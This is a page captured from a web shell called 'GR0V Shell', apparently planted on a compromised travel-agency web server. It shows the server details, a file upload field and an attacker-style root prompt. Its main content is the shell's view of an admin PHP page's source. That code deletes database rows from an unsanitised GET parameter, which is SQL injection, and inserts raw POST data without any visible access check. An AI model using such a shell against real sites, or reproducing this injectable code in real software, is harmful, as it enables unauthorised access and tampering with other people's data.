? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/gall/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/gall/promotion.php

<? include("header.php");?>
 <div id="top-panel">
            <div id="panel">
                <ul>
                    <li><a href="site.php" class="report">Site</a></li>
                      <li><a href="pay.php" class="report">Payment</a></li>
        <li><a href="promotion.php" class="report">Promotion</a></li>
                </ul>
            </div>
      </div> 
<div id="content">
             
             
             <div id="box" >
                	<h3>Promotion</h3>
                	<table width="99%">
						<thead>
							<tr>
                            <th><a href="#">Code</a></th>       
                            <th><a href="#">Promotion</a></th>       
                            	<th><a href="#">Discounte</a></th>       
                                <th width="60px"><a href="#">Action</a></th>
                            </tr>
						</thead>
						<tbody>
                       
<?
if(isset($_GET[del])){
$db->query("delete from promotion where pro_id = $_GET[del]");
echo "<script>window.location.href='promotion.php';</script>";
}
?>
<?
if(isset($_POST[c_pro]) && $_POST[pro_code]!="" && $_POST[pro_value] <= 100 && $_POST[pro_value] >=0 &&  is_numeric($_POST[pro_value]) ){
	unset($_POST[c_pro]);
$db->insert_array("promotion",$_POST);
}
?>
<? $sql = "select * from promotion  order by pro_id ";
   $res = $db->query($sql);
   while($line = mysql_fetch_array($res)){ 
?>               <tr>
    						<td width="10px">   <? echo $line[pro_code];?> </td>
                           <td>  <a href="promotion_link.php?pro_id=<? echo $line[pro_id];?>"> <? echo $line[pro_name];?></a>  </td>                            
                          <td align="right"> <? echo $line[pro_value];?> %     </td>
							   <td align="center">
<a href="promotion_link.php?pro_id=<? echo $line[pro_id];?>"><img src="img/icons/page_white_link.png" title="Show profile" width="16" height="16" /></a>
 <a href="edit_promotion.php?pro_id=<? echo $line[pro_id];?>"><img src="img/icons/page_white_edit.png"  width="16" height="16" /></a>
<a href="?del=<?=$line[pro_id]?>" onclick="if(!confirm('ต้องการลบ ?')){return false;}"><img src="img/icons/page_white_delete.png"  width="16" height="16" /></a>
							</td></tr>
<? } ?>
 			<tr>
 
					<form action="" method="post">
<?
//author: polmme
function code($codelenght){ 
while($newcode_length < $codelenght) {
$x=1;
$y=3;
$part = rand($x,$y);
if($part==1){$a=48;$b=57;}  // Numbers
if($part==2){$a=65;$b=90;}  // UpperCase
if($part==3){$a=97;$b=122;} // LowerCase
$code_part=chr(rand($a,$b));
$newcode_length = $newcode_length + 1;
$newcode = $newcode.$code_part;
}
return $newcode;
}
?>
                        <td align="center"><input name="pro_code" type="text" value="<? echo code(10);  ?>" /></td>
                         <td  ><input name="pro_name" type="text" /></td>
                       <td align="right"><input name="pro_value" type="text" size="5" />%
                        </td>
                        <td><input name="c_pro" type="submit" value="Create Promotion"/></td>
                   </form>     
                        
     </tr>
						</tbody>
					</table>
         
                </div>
                
                
</div>

      <? include("footer.php");?>

T1KUS90T
  root-grov@210.1.60.28:~$